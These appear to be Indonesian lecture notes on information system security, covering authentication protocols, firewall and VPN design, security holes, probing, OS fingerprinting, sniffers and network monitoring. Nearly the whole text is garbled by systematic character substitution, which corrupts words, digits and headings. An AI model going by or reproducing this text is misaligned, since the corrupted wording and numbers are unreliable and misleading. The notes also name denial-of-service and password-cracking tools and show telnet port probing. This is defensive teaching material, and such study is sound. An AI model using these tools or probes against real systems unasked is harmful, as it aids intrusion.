>. S2$e& '!e%%)o"e*
S&stem so(t4a"e &ang mem+ent$ one time #ass4o"d 'OTP* +e"dasa"$an in(o"masi
%oginte"$hi" dengan at"an "andom te"tent.
?. Pass4o"d Athenti)ation P"oto)o% 'PAP*
P"oto$o% da a"ah nt$ PPP 'Point to #oint P"oto)o%*. Pee" mengi"im #asangan se"
id dan #ass4o"d, athenti)ato" men&et,in&a.
@. 1ha%%enge Handsha$e Athenti)ation P"oto)o% '1HAP*
S2$e& #ada PAP, #"oto)o% ? a"ah, athenti)ato" mengi"im #esan tantangan $e #ee",
#ee" menghitng ni%ai %a% mengi"im$an $e athenti)ato", athenti)ato" men&et,i
otenti$asi ,i$a ,a4a+ann&a sama dengan ni%ai tadi.
8. Remote Athenti)ation Dia%0in Use" Se"3i)e 'RADIUS*
Unt$ h+ngan dia%0#, menggna$an net4o"$ a))ess se"3e", da"i sat host &ang
men,adi )%ient RADIUS, me"#an s&stem sat titi$ a$ses.
D. Te"mina% A))ess 1ont"o%%e" A))ess 1ont"o% S&stem 'TA1A1S*
P"oto$o% $eamanan +e"+asis se"3e" da"i 1IS1O S&stem. Se)"&^it& Se"3e" te"#sat
dangan (i%e #ass4o"d UNIP, data+ase otenti$asi, oto"isasi dan a$nting, (ngsi digest
't"ansmisi #ass4o"d &ang tida$ #o%os*
4* Mel!ndun! Aset Oran!sas!
A*(e,ara Adm!ns!strat!% - %!s!#
Ren)ana $emng$inan te"hada# +en)ana
P"og"am #en&a"ingan )a%on #ega4ai s&stem in(o"masi
P"og"am #e%atihan se"
Ke+i,a$an a$ses net4o"$
0* (e,ara Te#n!s
0*)* Penerapan 3!reEall
Ist!la" pada penerapan 3!reEall
Host
Sat sistem $om#te" &ang te"h+ng #ada sat net4o"$
!astion host
Sistem $om#te" &ang ha"s memi%i$i ting$at se$"itas &ang tinggi $a"ena sistem ini
"a4an se$a%i te"hada# se"angan ha)$e" dan )"a)$e", $a"ena +iasan&a mesin ini die$s#os
$e net4o"$ %a" 'Inte"net* dan me"#a$an titi$ $onta$ tama #a"a se" da"i inte"na%
net4o"$.
Pa)$et Fi%te"ing
A$si da"i sat de3ais nt$ mengat" se)a"a se%e$ti( a%" data &ang me%intasi sat
net4o"$. Pa)$et (i%te" da#at mem+%o$ ata mem#e"+o%eh$an sat #a$et data &ang
me%intasi net4o"$ te"se+t sesai dengan $e+i,a$sanaan a%" data &ang digna$an
'se)"it& #o%i)&*.
Pe"imete" net4o"$
Sat net4o"$ tam+ahan &ang te"da#at di anta"a net4o"$ &ang di%indngi dengan net4o"$
e$ste"na%, nt$ men&edia$an %a&e" tam+ahan da"i sat sistem se)"it&. Pe"imete"
net4o"$ ,ga se"ing dise+t dengan DMT 'De0Mi%%ita"iEed Tone*.
Keuntunan 3!reEall :
Fi"e4a%% me"#a$an (o$s da"i sega%a $e#tsan se$"itas. Ha% ini dise+a+$an $a"ena
Fi"e4a%% me"#a$an sat titi$ tem#at $e%a" mas$n&a t"a(i$ inte"net #ada sat ,a"ingan.
Fi"e4a%% da#at mene"a#$an sat $e+i,a$sanaan se$"itas. !an&a$ se$a%i se"3i)e0se"3i)e
&ang digna$an di Inte"net. Tida$ sema se"3i)e te"se+t aman digna$an, o%eh
$a"enan&a Fi"e4a%% da#at +e"(ngsi se+agai #en,aga nt$ menga4asi se"3i)e0se"3i)e
mana &ang da#at digna$an nt$ men, dan meningga%$an sat net4o"$.
Fi"e4a%% da#at men)atat sega%a a$ti3itas &ang +e"$aitan dengan a%" data se)a"a e(isien.
Sema t"a(i$ &ang me%a%i Fi"e4a%% da#at diamati dan di)atat sega%a a$ti3itas &ang
+e"$enaan dengan a%" data te"se+t. Dengan demi$ian Net4o"$ Administ"ato" da#at
sege"a mengetahi ,i$a te"da#at a$ti3itas0a$ti3itas &ang +e"saha nt$ men&e"ang
inte"na% net4o"$ me"e$a.
Fi"e4a%% da#at digna$an nt$ mem+atasi #engnaan sm+e"da&a in(o"masi. Mesin
&ang menggna$an Fi"e4a%% me"#a$an mesin &ang te"h+ng #ada +e+e"a#a net4o"$
&ang +e"+eda, sehingga $ita da#at mem+atasi net4o"$ mana sa,a &ang da#at menga$ses
sat se"3i)e &ang te"da#at #ada net4o"$ %ainn&a.
Kelema"an 3!reEall :
Fi"e4a%% tida$ da#at me%indngi net4o"$ da"i se"angan $one$si &ang tida$ me%e4atin&a
'te"da#at #int %ain men, net4o"$ te"se+t*.
Fi"e4a%% tida$ da#at me%indngi da"i se"angan dengan metoda +a" &ang +e%m di$ena%
o%eh Fi"e4a%%.
Fi"e4a%% tida$ da#at me%indngi da"i se"angan 3i"s.
Pilihan klasifikasi desain Firewall :
9. Pa)$et Fi%te"ing
Sistem #a$et filterin/ ata se"ing ,ga dise+t dengan screenin/ router ada%ah
router &ang me%a$$an "oting #a$et anta"a inte"na% dan e$ste"na% net'or" se)a"a
se%e$ti( sesai dengan security policy &ang digna$an #ada net'or" te"se+t.
In(o"masi &ang digna$an nt$ men&e%e$si #a$et0#a$et te"se+t ada%ah:
IP add"ess asa%
IP add"ess t,an
P"oto)o% 'T1P, UDP, ata I1MP*
Po"t T1P ata UDP asa%
Po"t T1P ata UDP t,an
!e+e"a#a )ontoh "oting #a$et se%e$ti( &ang di%a$$an o%eh Screenin/ ,outer :
Sema $one$si da"i %a" sistem &ang men, inte"na% net'or" di+%o$ade $e)a%i
nt$ $one$si SMTP
Mem#e"+o%eh$an serice emai% dan FTP, teta#i mem+%o$ serice0serice
+e"+aha&a se#e"ti TFTP, P =indo4, RP1 dan ."/ serice '"%ogin, "sh, ")#, dan
%ain0%ain*.
Se%ain memi%i$i $entngan te"tent di anta"an&a a#%i$asi screenin/ router ini da#at
+e"si(at t"ans#a"an dan im#%ementasin&a "e%ati( %e+ih m"ah di+anding$an metode
fire'all &ang %ain, sistem #a$et filterin/ ini memi%i$i +e+e"a#a $e$"angan &a$ni :
ting$at securityn&a masih "endah, masih memng$in$an adan&a IP S#oo(ing, tida$
ada screenin/ #ada %a&e"0%a&e" di atas net'or" %a&e".
>. A##%i)ation Le3e% Gate4a& 'P"oK& Se"3i)es*
#ro8y serice me"#a$an a#%i$asi s#esi(i$ ata #"og"am se"3e" &ang di,a%an$an #ada
mesin !ire'all, #"og"am ini mengam+i% user re.uest nt$ Inte"net serice 'se#e"ti
FTP, te%net, HTTP* dan mene"s$ann&a '+e"gantng #ada security policy* $e host
&ang dit,* Dengan $ata %ain ada%ah pro8y me"#a$an #e"anta"a anta"a inte"na%
net'or" dengan e$ste"na% net'or" 'Inte"net*.
Pada sisi e$te"na% han&a di$ena% mesin pro8y te"se+t, sedang$an mesin0mesin &ang
+e"ada di +a%i$ mesin pro8y te"se+t tida$ te"%ihat. A$i+atn&a sistem pro8y ini
$"ang t"ans#a"an te"hada# user &ang ada di da%am
Sistem #ro8y ini e(e$ti( han&a ,i$a #ada $on,ngsi anta"a inte"na% dan e$ste"na%
net'or" te"da#at me$anisme &ang tida$ mem#e"+o%eh$an $eda net'or" te"se+t
te"%i+at da%am $omni$asi %angsng.
Kentngan &ang dimi%i$i o%eh sistem pro8y ini ada%ah ting$at se$"itasn&a %e+ih
+ai$ da"i#ada screenin/ router, dete$si #a$et &ang di%a$$an sam#ai #ada %a&e"
a#%i$asi. Sedang$an $e$"angan da"i sistem ini ada%ah #e"(omansin&a %e+ih "endah
da"i#ada screenin/ router $a"ena te",adi #enam+ahan header #ada #a$et &ang
di$i"im, a#%i$asi &ang di0support o%eh pro8y ini te"+atas, se"ta sistem ini $"ang
t"ans#a"an.
Ars!te#tur dasar %!reEall :
A"site$t" dengan da%0homed host '$adang $adang di$ena% ,ga se+agai dual homed
/ate'ay2 DHG*
Sistem DHG menggna$an se+ah $om#te" dengan '#a%ing sedi$it* da net4o"$0
inte"(a)e. Inte"(a)e #e"tama dih+ng$an dengan ,a"ingan inte"na% dan &ang %ainn&a
dengan Inte"net. Da%0homed host n&a sendi"i +e"(ngsi se+agai +astion host '("ont
te"de#an, +agian te"#enting da%am (i"e4a%%*.
s)"eened0host 'screened host /ate'ay2 SHG*
Pada to#o%ogi SHG, (ngsi (i"e4a%% di%a$$an o%eh se+ah s)"eening0"ote" dan +astion
host. Rote" ini di$on(ig"asi sedemi$ian sehingga a$an meno%a$ sema t"a(i$ $e)a%i
&ang dit,$an $e +astion host, sedang$an #ada t"a(i$ inte"na% tida$ di%a$$an
#em+atasan. Dengan )a"a ini setia# )%ient se"3is #ada ,a"ingan inte"na% da#at
menggna$an (asi%itas $omni$asi standa"d dengan Inte"net tan#a ha"s me%a%i #"oK&.
s)"eened s+net 'screened subnet /ate'ay2 SSG*.
Fi"e4a%% dengan a"site$t" s)"eened0s+net menggna$an da s)"eening0"ote" dan
,a"ingan tengah 'perimeter net'or"* anta"a $eda "ote" te"se+t, dimana ditem#at$an
+astion host. Ke%e+ihan ssnan ini a$an te"%ihat #ada 4a$t o#timasi #enem#atan se"3e".

Inte"net
+astion
host
A"site$t" dengan da%0homed host
Inte"net
+astion0host
"ote"
A"site$t" dengan s)"eened0host
0*4* Penerapan :!rtual Pr!+at NetEor# ':PN9
De%en!s! :PN
Mi"ta% P"i3ate Net4o"$ ata 6a"ingan P"i+adi Ma&a sesngghn&a sama dengan 6a"ingan
P"i+adi 'P"i3ate Net4o"$2PN* #ada mmn&a, di mana sat ,a"ingan $om#te" sat %em+aga
ata #e"sahaan di sat dae"ah ata nega"a te"h+ng dengan ,a"ingan $om#te" da"i sat
g"# #e"sahaan &ang sama di dae"ah ata nega"a %ain. Pe"+edaann&a han&a%ah #ada media
#engh+ng anta" ,a"ingan. Ka%a #ada PN, media #engh+ngn&a masih me"#a$an mi%i$
#e"sahaan2g"# it sendi"i, da%am MPN, media #engh+ngn&a ada%ah ,a"ingan #+%i$
se#e"ti Inte"net.
Da%am MPN, $a"ena media #engh+ng anta" ,a"ingann&a ada%ah ,a"ingan #+%i$, di#e"%$an
#engamanan dan #em+atasan0#em+atasan. Pengamanan di#e"%$an nt$ men,aga aga" tida$
se+a"ang o"ang da"i ,a"ingan #+%i$ da#at mas$ $e ,a"ingan #"i+adi. Cang di$e)a%i$an
han&a%ah o"ang0o"ang &ang te"da(ta" ata te"otenti(i$asi te"%e+ih dah% &ang da#at mas$ $e
,a"ingan #"i+adi. Pem+atasan di#e"%$an nt$ men,aga aga" tida$ sema o"ang ata se" da"i
,a"ingan #"i+adi da#at menga$ses ,a"ingan #+%i$ 'inte"net*.
Cara membentu# :PN
)* Tunnell!n
Sesai dengan a"ti tnne% ata %o"ong, da%am mem+ent$ sat MPN ini di+at sat tnne% di
da%am ,a"ingan #+%i$ nt$ mengh+ng$an anta"a ,a"ingan &ang sat dan ,a"ingan %ain da"i
sat g"# ata #e"sahaan.&ang ingin mem+angn MPN te"se+t. Se%"h $omni$asi data
anta",a"ingan #"i+adi a$an me%a%i tnne% ini, sehingga o"ang ata se" da"i ,a"ingan #+%i$
&ang tida$ memi%i$i iEin nt$ mas$ tida$ a$an mam# nt$ men&ada#, menga)a$ ata
men)"i data &ang me%intasi tnne% ini. Ada +e+e"a#a metode tne%%ing &ang mm di#a$ai,
di anta"an&a:
0 IPP To IP Tnne%%ing, ata
0 PPP To IP Tnne%%ing
IPP To IP tnne%%ing +iasa digna$an da%am ,a"ingan MPN No3e%% Net4a"e. 6adi da ,a"ingan
No3e%% &ang te"#isah a$an teta# da#at sa%ing me%a$$an $omni$asi data me%a%i ,a"ingan
#+%i$ Inte"net me%a%i tnne% ini tan#a $ati" a$an adan&a ganggan #iha$ $e0? &ang ingin
Inte"net
+astion0host
"ote"
e$ste"na%
A"site$t" dengan s)"eened0s+net
"ote"
inte"na%
,a"ingan tengah
menggangg ata men)"i data. Pada IPP To IP tnne%%ing, #a$et data dengan #"oto$o% IPP
'standa" #"oto$o% No3e%%* a$an di+ng$s 'en)a#s%ated* te"%e+ih dah% o%eh #"oto$o% IP
'standa" #"oto$o% Inte"net* sehingga da#at me%a%i tnne% ini #ada ,a"ingan #+%i$ Inte"net.
Sama ha%n&a nt$ PPP To IP tnne%%ing, di mana PPP #"oto$o% dien)a#s%ated o%eh IP
#"oto$o%.
Saat ini +e+e"a#a 3endo" ha"d4a"e "ote" se#e"ti 1is)o, Shi3a, !a& Net4o"$s sdah
menam+ah$an $emam#an MPN dengan te$no%ogi tnne%%ing #ada ha"d4a"e me"e$a.
4* 3!reEall
Se+agaimana %a&a$n&a sat dinding, Fi"e4a%% a$an +e"tinda$ se+agai #e%indng ata
#em+atas te"hada# o"ang0o"ang &ang tida$ +e"ha$ nt$ menga$ses ,a"ingan $ita. Ummn&a
da ,a"ingan &ang te"#isah &ang menggna$an Fi"e4a%% &ang se,enis, ata seo"ang "emote
se" &ang te"h+ng $e ,a"ingan dengan menggna$an so(t4a"e )%ient &ang te"en$"i#si a$an
mem+ent$ sat MPN, mes$i#n media #engh+ng da"i $eda ,a"ingan te"se+t ata
#engh+ng anta"a "emote se" dengan ,a"ingan te"se+t ada%ah ,a"ingan #+%i$ se#e"ti
Inte"net.
Sat ,a"ingan &ang te"h+ng $e Inte"net #asti memi%i$i IP add"ess 'a%amat Inte"net* $hss
nt$ masing0masing $om#te" &ang te"h+ng da%am ,a"ingan te"se+t. A#a+i%a ,a"ingan ini
tida$ te"%indngi o%eh tnne% ata (i"e4a%%, IP add"ess tadi a$an dengan mdahn&a di$ena%i
ata di%a)a$ o%eh #iha$0#iha$ &ang tida$ diingin$an. A$i+atn&a data &ang te"da#at da%am
$om#te" &ang te"h+ng $e ,a"ingan tadi a$an da#at di)"i ata di+ah. Dengan adan&a
#e%indng se#e"ti (i"e4a%%, $ita +isa men&em+n&i$an 'hide* add"ess tadi sehingga tida$ da#at
di%a)a$ o%eh #iha$0#iha$ &ang tida$ diingin$an.
Kemampuan %!reEall dalam penerapann&a pada :PN
o IP Hiding2Ma##ing. Kemam#an ini menga$i+at$an IP add"ess da%am ,a"ingan di#eta$an
ata dit"ans%asi$an $e sat IP add"ess +a". Dengan demi$ian IP add"ess da%am ,a"ingan
tida$ a$an di$ena%i di Inte"net.
o P"i3i%ege Limitation. Dengan $emam#an ini $ita da#at mem+atasi #a"a se" da%am
,a"ingan sesai dengan oto"isasi ata ha$ &ang di+e"i$an $e#adan&a. Misa%n&a, Use" A
han&a +o%eh menga$ses home #age, se" ! +o%eh menga$ses home #age, e0mai% dan
ne4s, sedang$an se" 1 han&a +o%eh menga$ses e0mai%.
o Otside Limitation. Dengan $emam#an ini $ita da#at mem+atasi #a"a se" da%am
,a"ingan nt$ han&a menga$ses $e a%amat0a%amat te"tent di Inte"net di %a" da"i ,a"ingan
$ita.
o Inside Limitation. Kadang0$adang $ita masih mem#e"+o%eh$an o"ang %a" nt$
menga$ses in(o"masi &ang te"sedia da%am sa%ah sat $om#te" 'misa%n&a =e+ Se"3e"*
da%am ,a"ingan $ita. Se%ain it, tida$ di#e"+o%eh$an, ata memang sama se$a%i tida$
diEin$an nt$ menga$ses se%"h $om#te" &ang te"h+ng $e ,a"ingan $ita.
o Pass4o"d and En)"&#ted Athenti)ation. !e+e"a#a se" di %a" ,a"ingan memang
diiEin$an nt$ mas$ $e ,a"ingan $ita nt$ menga$ses data dan se+again&a, dengan
te"%e+ih dah% ha"s memas$$an #ass4o"d $hss &ang sdah te"en$"i#si.
5* Menaman#an saluran terbu#a
P"oto$o% T1P2IP me"#a$an #"oto)o% da%am set standa" &ang te"+$a da%am #engi"iman data,
nt$ it%ah #e"% di%a$$an en$"i#si da%am "ang$a #enanganan $eamanan data &ang
dite"a#$an #ada #"oto)o% te"se+t, &ang me%i#ti :
A* Keamanan Panda lap!san Apl!#as!
SET 'Se)"e E%e)t"oni)s T"ansa)tion*
o Menent$an +agaimana t"ansa$si menga%i" anta"a #ema$ai, #edagang dan
+an$.
o Menent$an (ngsi $eamanan : digita% signat"e, hash dan en$"i#si.
o P"od$ da"i Maste")a"d dan MISA Inte"nationa%.
Se)"e HTTP
o P"od$ da"i 4o"$g"o# IETF, diim#%ementasi$an #ada 4e+se"3e" m%ai
9::8.
o Menent$an me$anisme $"i#tog"a(i standa" nt$ mengen$"i#si$an
#engi"iman data htt#
P"ett& Good P"i3a)& 'PGP*
o Standa"isasi RF1 9::9
o Mem+at dan memasti$an digita% signat"e, mengen$"i#si Y des$"i#si dan
meng$om#"esi data.
Se)"e MIME 'S2MIME*
o Standa"isasi RF1 98>9
o MIME 'M%ti#"#ose Inte"net Mai% EKtension*
o Menent$an )a"a menem#e%$an (i%e nt$ di$i"im $e inte"net dengan
menggna$an metode hi"a"$i da%m #ende(enisian se" "emi dan se"t(i$at
digita%n&a.
1&+e")ash
o Standa"isasi RF1 9J:J
o Mem#"oses $a"t $"edit di inte"net dengan mengen$"i#si dan
menandatangani t"ansa$si se)a"a digita%.
0* Keamanan dalam Lap!san Transport
SSL 'Se)"e So)$et La&e"*
o P"od$ Nets)a#e
o P"oto)o% &ang menegoisasi$an h+ngan &ang aman anta"a )%ient dan se"3e",
dengan menggna$an $n)i en$"i#si @G0+it.
C* Keamanan dalam Lap!san NetEor#
IP se)"it& P"oto)o% : me%indngi #"oto)o% )%ient IP #ada net4o"$
%a&e".
IP Athenti)ation heade"
IP En)a#s%ating Se)"it& #"oto)o%
Sim#%e0$e& management (o" Inte"net #"oto)o% 'SKIP*
Inte"net se)"it& Asso)iation and $e& management #"oto)o%
'ISAKMP*
Inte"net $e& management #"oto)o% 'IKMP*
Sm+e" : 444.iet(.o"g
EVALUASI KEAMANAN SISTEM INFORMASI
(E0A0 MA(ALAH KEAMANAN HARU( (ELALU DIMONITOR :
Ditem$ann&a %+ang $eamanan 'se)"it& ho%e* &ang +a". Pe"ang$at %na$ dan
#e"ang$at $e"as +iasan&a sangat $om#%e$s sehingga tida$ mng$in nt$ di,i se"ats
#e"sen. Kadang0$adang ada %+ang $eamanan &ang ditim+%$an o%eh $e)e"o+ohan
im#%ementasi.
Kesa%ahan $on(ig"asi. Kadang0$adang $a"ena %a%ai ata a%#a, $on(ig"asi se+ah sistem
$"ang +ena" sehingga menim+%$an %+ang $eamanan. Misa%n&a mode '#e"mission ata
$e#emi%i$an* da"i +e"$as &ang men&im#an #ass4o"d '2et)2#ass4d di sistem UNIP* se)a"a
tida$ senga,a di+ah sehingga da#at di+ah ata dit%is o%eh o"ang0o"ang &ang tida$
+e"ha$.
Penam+ahan #e"ang$at +a" 'ha"d4a"e dan2ata so(t4a"e* &ang men&e+a+$an
men"nn&a ting$at se)"it& ata +e"+ahn&a metoda nt$ mengo#e"asi$an sistem.
O#e"ato" dan administ"ato" ha"s +e%a,a" %agi. Da%am masa +e%a,a" ini +an&a$ ha% &ang
,ah da"i sem#"na, misa%n&a se"3e" ata so(t4a"e masih menggna$an $on(ig"asi a4a%
da"i 3endo" 'dengan #ass4o"d &ang sama*.
(UM0ER LU0AN2 KEAMANAN
)* (ala" D!sa!n 'des!n %laE9
Ummn&a ,a"ang te",adi. A$an teta#i a#a+i%a te",adi sangat s%it nt$ di#e"+ai$i.
A$i+at disain &ang sa%ah, ma$a +ia"#n dia diim#%ementasi$an dengan +ai$,
$e%emahan da"i sistem a$an teta# ada.
1ontoh :
Lemah disainn&a a%go"itma en$"i#si ROT9? ata 1aesa" )i#he", dimana $a"a$te"
digese" 9? h"( ata ? h"(. Mes$i#n diim#%ementasi$an dengan
#"og"amming &ang sangat te%iti, sia#a#n &ang mengetahi a%go"itman&a da#at
meme)ah$an en$"i#si te"se+t.
Kesa%ahan disain "tan nomo" 'se_en)e nm+e"ing* da"i #a$et T1P2IP.
Kesa%ahan ini da#at die$s#%oitasi sehingga tim+% masa%ah &ang di$ena% dengan
nama BIP s#oo(ing5 'se+ah host mema%s$an di"i seo%ah0o%ah men,adi host
%ain dengan mem+at #a$et #a%s sete%ah engamati "tan #a$et da"i host &ang
henda$ dise"ang*.
4* Implementas! #uran ba!#
!an&a$ #"og"am &ang diim#%ementasi$an se)a"a te"+"0+" sehingga $"ang
)e"mat da%am #eng$odean.
A$i+at tida$ adan&a )e$ ata testing im#%ementasi sat #"og"am &ang +a" di+at.
1ontoh:
Tida$ mem#e"hati$an +atas 'B+ond5* da"i se+ah Ba""a&5 tida$ di)e$ sehingga
te",adi &ang dise+t ot0o(0+ond a""a& ata +((e" o3e"(%o4 &ang da#at
die$s#%oitasi 'misa%n&a o3e"4"ite $e 3a"ia+%e +e"i$tn&a*.
Kea%#aan mem(i%te" $a"a$te"0$a"a$te" &ang aneh0aneh &ang dimas$$an se+agai
in#t da"i se+ah #"og"am sehingga sang #"og"am da#at menga$ses +e"$as ata
in(o"masi &ang semestin&a tida$ +o%eh dia$ses.
5* (ala" #on%!uras!
1ontoh :
!e"$as &ang semestin&a tida$ da#at di+ah o%eh #ema$ai se)a"a tida$ senga,a
men,adi B4"itea+%e5. A#a+i%a +e"$as te"se+t me"#a$an +e"$as &ang #enting,
se#e"ti +e"$as &ang digna$an nt$ men&im#an #ass4o"d, ma$a e(e$n&a
men,adi %+ang $eamanan. Kadang$a%a se+ah $om#te" di,a% dengan
$on(ig"asi &ang sangat %emah.
Adan&a #"og"am &ang se)a"a tida$ senga,a diset men,adi Bsetid "oot5 sehingga
$eti$a di,a%an$an #ema$ai memi%i$i a$ses se#e"ti s#e" se" '"oot* &ang da#at
me%a$$an a#a sa,a.
6* (ala" menuna#an proram atau s!stem
1ontoh :
Kesa%ahan menggna$an #"og"am &ang di,a%an$an dengan menggna$an a))ont
"oot 's#e" se"* da#at +e"a$i+at (ata%.
PEN2U1I KEAMANAN (I(TEM
Unt$ memdah$an administ"ato" da"i sistem in(o"masi mem+th$an Batomated too%s5,
#e"ang$at #em+ant otomatis, &ang da#at mem+ant meng,i ata meng0e3a%asi
$eamanan sistem &ang di$e%o%a.
1ontoh Too%s Te"integ"asi:
Peran#at luna# bantu (!stem Operas!
1o#s UNIP
T"i#4i"e UNIP
Satan2Saint UNIP
S!S)an: %o)a%host se)"it& s)anne" UNIP
!a%%ista Nhtt#:22444.se)net.)omO =indo4s NT
Dan seba/ainya9 (cari sendiri:1
1ontoh Too%s Peng,ian &ang di+at #a"a ha)$e" :
Tools Keunaan
1"a)$ #"og"am nt$ mendga ata meme)ah$an #ass4o"d
dengan menggna$an se+ah ata +e+e"a#a $ams 'di)tiona"&*.
P"og"am )"a)$ ini me%a$$an +"te (o")e )"a)$ing dengan
men)o+a mengen$"i#si$an se+ah $ata &ang diam+i% da"i $ams,
dan $emdian mem+anding$an hasi% en$"i#si dengan #ass4o"d
&ang ingin di#e)ah$an.
%and dan %atie""a sistem =indo4s :82NT men,adi ma)et 'hang, %o)$ #*. P"og"am
ini mengi"im$an se+ah #a$et &ang sdah di5s#oo(ed5 sehingga
seo%ah0o%ah #a$et te"se+t +e"asa% da"i mesin &ang sama dengan
menggna$an #o"t &ang te"+$a
Ping0o0death se+ah #"og"am '#ing* &ang da#at meng0)"ash0$an =indo4s
:82NT dan +e+e"a#a 3e"si UniK.
=in$e #"og"am nt$ mema)et$an sistem +e"+asis =indo4s
Dan seba/ainya9 (cari sendiri:1
PRO0IN2 (ER:ICE(
De(enisi P"o+ing : B#"o+e5 'me"a+a* se"3is a#a sa,a &ang te"sedia. P"og"am ini ,ga
da#at digna$an o%eh $"imina% nt$ me%ihat se"3is a#a sa,a &ang te"sedia di sistem
&ang a$an dise"ang dan +e"dasa"$an data0data &ang di#e"o%eh da#at me%an)a"$an
se"angan.
Se"3is di Inte"net mmn&a di%a$$an dengan menggna$an #"oto$o% T1P ata UDP.
Setia# se"3is di,a%an$an dengan menggna$an #o"t &ang +e"+eda, misa%n&a:
o SMTP, nt$ mengi"im dan mene"ima e0mai%, T1P, #o"t >8
o POP?, nt$ mengam+i% e0mai%, T1P, #o"t 99G
1ontoh di atas han&a se+agian da"i se"3is &ang te"sedia. Di s&stem UNIP, %ihat
+e"$as 2et)2se"3i)es dan 2et)2inetd.)on( nt$ me%ihat se"3is a#a sa,a &ang di,a%an$an
o%eh se"3e" ata $om#te" &ang +e"sang$tan.
Pemi%ihan se"3is a#a sa,a te"gantng $e#ada $e+than dan ting$at $eamanan &ang
diingin$an. Sa&angn&a se"ing$a%i sistem &ang di+e%i ata di"a$it men,a%an$an
+e+e"a#a se"3is tama se+agai Bde(a%t5. Kadang0$adang +e+e"a#a se"3is ha"s
dimati$an $a"ena ada $emng$inan da#at die$s#%oitasi o%eh )"a)$e". Unt$ it ada
+e+e"a#a #"og"am &ang da#at digna$an nt$ me%a$$an
Unt$ +e+e"a#a se"3is &ang +e"+asis T1P2IP, #"oses #"o+e da#at di%a$$an dengan
menggna$an #"og"am te%net. Misa%n&a nt$ me%ihat a#a$ah ada se"3is e0mai%
dengan menggna$an SMTP digna$an te%net $e #o"t >8 dan #o"t 99G.
unix9 telnet target.host.com %"
unix9 telnet localhost ##$
Proram penuj! prob!n 'penuj! semua port otomat!s9 :
Pa$et #"o+e nt$ sistem UNIP
` nma#
` st"o+e
` t)##"o+e
P"o+e nt$ sistem =indo4 :82:J2NT
` NetLa+
` 1&+e"$it
` Og"e
Proram &an memon!tor adan&a prob!n #e s&stem
P"o+ing +iasan&a meningga%$an ,e,a$ di +e"$as %og di s&stem anda. Dengan mengamati ent"&
di da%am +e"$as %og da#at di$etahi adan&a #"o+ing. Se%ain it, ada ,ga #"og"am nt$
memonito" #"o+e se#e"ti #a$et #"og"am )o"tne&, #o"tsent"& dan t)#%ogd.
O( 3IN2ERPRINTIN2
Finge"#"inting : Ana%isa OS sistem &ang dit,a aga" da#at me%ihat data+ase $e%emahan
sistem &ang dit,.
Metode Finge"#"inting :
1a"a &ang #a%ing $on3ensiona% :
o Se"3i)e te%net $e se"3e" &ang dit,, ,i$a se"3e" te"se+t $e+et%an
men&edia$an se"3is te%net, se"ing$a%i ada +anne" &ang menn,$$an nama OS
+ese"ta 3e"sin&a.
o Se"3i)e FTP di #o"t >9. Dengan me%a$$an te%net $e #o"t te"se+t dan
mem+e"i$an #e"intah BSCST5 anda da#at mengetahi 3e"si da"i OS &ang
digna$an.
o Me%a$$an (inge" $e =e+ se"3e", dengan menggna$an #"og"am net)at 'n)*.
1a"a (inge"#"inting &ang %e+ih )anggih ada%ah dengan mengana%isa "es#on sistem
te"hada# #e"mintaan '"e_est* te"tent. Misa%n&a dengan mengana%isa nomo" "t #a)$et
T1P2IP &ang di$e%a"$an o%eh se"3e" te"se+t da#at di#e"sem#it "ang ,enis da"i OS &ang
digna$an. Ada +e+e"a#a too%s nt$ me%a$$an dete$si OS ini anta"a %ain:
o nma#
o _eso
PEN22UNAAN PRO2RAM PEN/ERAN2
Unt$ mengetahi $e%emahan sistem in(o"masi ada%ah dengan men&e"ang di"i sendi"i
dengan #a$et0#a$et #"og"am #en&e"ang 'atta)$* &ang da#at di#e"o%eh di Inte"net.
Se%ain #"og"am #en&e"ang &ang si(atn&a ag"esi( me%m#h$an sistem &ang dit,, ada
,ga #"og"am #en&e"ang &ang si(atn&a me%a$$an #en)"ian ata #en&ada#an data.
Unt$ #en&ada#an data, +iasan&a di$ena% dengan isti%ah Bsni((e"5. Mes$i#n data tida$
di)"i se)a"a (isi$ 'da%am a"tian men,adi hi%ang*, sni((e" ini sangat +e"+aha&a $a"ena dia
da#at digna$an nt$ men&ada# #ass4o"d dan in(o"masi &ang sensiti(. Ini me"#a$an
se"angan te"hada# as#e$ #"i3a)&.
1ontoh #"og"am #en&ada# 'sni((e"* anta"a %ain:
o #)a#t"e 'UniK*
o sni((it 'UniK*
o t)#dm# 'UniK*
o =e+PRa& '=indo4s*
PEN22UNAAN (I(TEM PEMANTAU 1ARIN2AN
Sistem #emanta ,a"ingan 'net4o"$ monito"ing* da#at digna$an nt$ mengetahi
adan&a %+ang $eamaman.
Misa%n&a a#a+i%a anda memi%i$i se+ah se"3e" &ang semetin&a han&a da#at dia$ses o%eh
o"ang da"i da%am, a$an teta#i da"i #emanta ,a"ingan da#at te"%ihat +ah4a ada &ang
men)o+a menga$ses me%a%i tem#at %ain. Se%ain it dengan #emanta ,a"ingan da#at ,ga
di%ihat saha0saha nt$ me%m#h$an sistem dengan me%a%i denia% o( se"3i)e atta)$
'DoS* dengan mengi"im$an #a)$et &ang ,m%ahn&a +e"%e+ihan.
Net4o"$ monito"ing +iasan&a di%a$$an dengan menggna$an #"oto$o% SNMP 'Sim#%e
Net4o"$ Management P"oto)o%*.
Proram netEor# mon!tor!n - manaement :
Ethe"+o& '=indo4s*, Ethe"man 'UniK*
HP O#en3ie4 '=indo4s*
Pa)$et+o& '=indo4s*, Pa)$etman 'UniK*
SNMP 1o%%e)to" '=indo4s*
=e++o& '=indo4s*
Proram pemantau jar!nan &an t!da# menuna#an (NMP :
i#%og, i)m#%og, #d%og, &ang me"#a$an +agian da"i #a$et i#%og nt$ memanta
#a$et IP, I1MP, UDP.
i#t"a(, sdah te"mas$ da%am #a$et LinK De+ian netdiag
net4at)h, sdah te"mas$ da%am #a$et LinK De+ian netdiag
nto#, memanta ,a"ingan se#e"ti #"og"am to# &ang memanta #"oses di sistem UniK
t"a(sho4, menn,$$an t"a((i) anta" hosts da%am +ent$ teKt0mode
KEAMANAN DATA0A(E
Pen&e"angan Data+ase
In(o"masi sensiti( &ang te"sim#an di da%am data+ase da#at te"+$a 'disclosed* +agi o"ang0
o"ang &ang tida$ diiEin$an 'natho"iEed *.
In(o"masi sensiti( &ang te"sim#an di da%am data+ase da#at altered in an na))e#ta+%e
manne"
In(o"masi sensiti( &ang te"sim#an di da%am data+ase da#at inaccessible +agi o"ang0o"ang
&ang diiEin$an.
the nde"%&ing o#e"ating s&stem ma& +e atta)$ed 00 most di((i)%t #"o+%em
Data+ase In(e"en)e P"o+%em
